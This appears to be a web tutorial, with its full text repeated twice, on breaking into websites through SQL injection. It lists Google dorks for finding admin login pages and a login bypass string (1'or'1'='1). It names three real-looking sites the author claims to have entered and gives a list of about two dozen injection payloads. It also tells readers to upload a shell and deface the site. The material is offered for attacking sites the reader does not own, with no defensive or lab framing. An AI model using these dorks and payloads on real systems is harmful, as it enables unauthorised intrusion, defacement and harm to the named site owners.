How to Hack website using SQL injection

Demo Of Basic SQL injection for website hacking

SQL injection is a technique often used to attack data driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to

pass a newly formed rogue SQL command to the database
(e.g., dump the database contents to the attacker).

SQL injection is a code injection technique that exploits a security vulnerability in an application's software. The vulnerability happens when user input is either incorrectly filtered for string literale scape
characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but canbe used to attack any type of SQL database. In operational environments, it has been noted that applications experience an average of 71 attempts an hour.

You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection). I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.

Dorks: inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
  inurl:administrator.asp
inurl:login.asp
  inurl:login.aspx
  inurl:login.php
  inurl:admin/index.php
  inurl:adminlogin.aspx

# Try to make your own dorks also to get more success rate.

Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1

Use the above mentioned login details and you will be into the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website.

Some websites which I got:
http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx

Other InjecTion Queries:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

Comments

How to Hack website using SQL injection

Demo Of Basic SQL injection for website hacking

SQL injection is a technique often used to attack data driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to

pass a newly formed rogue SQL command to the database
(e.g., dump the database contents to the attacker).

SQL injection is a code injection technique that exploits a security vulnerability in an application's software. The vulnerability happens when user input is either incorrectly filtered for string literale scape
characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but canbe used to attack any type of SQL database. In operational environments, it has been noted that applications experience an average of 71 attempts an hour.

You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection). I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.

Dorks: inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
  inurl:administrator.asp
inurl:login.asp
  inurl:login.aspx
  inurl:login.php
  inurl:admin/index.php
  inurl:adminlogin.aspx

# Try to make your own dorks also to get more success rate.

Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1

Use the above mentioned login details and you will be into the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website.

Some websites which I got:
http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx

Other InjecTion Queries:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

Comments